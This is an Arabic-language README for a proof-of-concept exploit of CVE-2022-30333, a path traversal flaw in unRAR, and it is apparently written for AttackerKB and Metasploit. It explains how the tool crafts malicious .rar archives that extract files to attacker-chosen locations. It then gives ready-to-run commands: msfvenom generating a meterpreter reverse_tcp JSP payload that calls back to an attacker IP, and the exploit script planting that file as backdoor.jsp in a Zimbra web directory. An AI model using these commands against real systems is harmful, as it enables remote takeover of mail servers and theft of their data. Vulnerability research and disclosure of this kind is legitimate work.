
إثبات مفهوم لاستغلال الثغرة CVE-2022-30333 الخاصة بـ path traversal في أداة unRAR، حيث يقوم بإنشاء ملفات .rar ضارة لاستخراج حمولات عشوائية إلى مواقع يحددها المهاجم.
إثبات مفهوم لثغرة CVE-2022-30333 - وهي ثغرة اجتياز المسار في إصدارات unRAR السابقة للإصدار 6.11. قمت بإنشاء هذا كعرض توضيحي للاستغلال لصالح كتاب AttackerKB، وآمل دمجه في وحدة Metasploit قريباً!
ببساطة، تقوم بتوفير هدف (بما في ذلك اجتياز المسار) وبعض بيانات الملف، وستقوم هذه الأداة بإنشاء ملف .rar يستخرج ذلك الملف إلى ذلك الموقع. الحد الأقصى لطول الملف هو 104 بايت، والحد الأقصى لطول الملف هو 4096 بايت. (هذا ليس متأصلاً في الثغرة، بل هو فقط ما اخترته عند إنشاء الملف).
على سبيل المثال، قم بإنشاء باب خلفي باستخدام msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
ثم أنشئ ملف .rar، وقم بزرع ملف .jsp في مكان ممتع:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar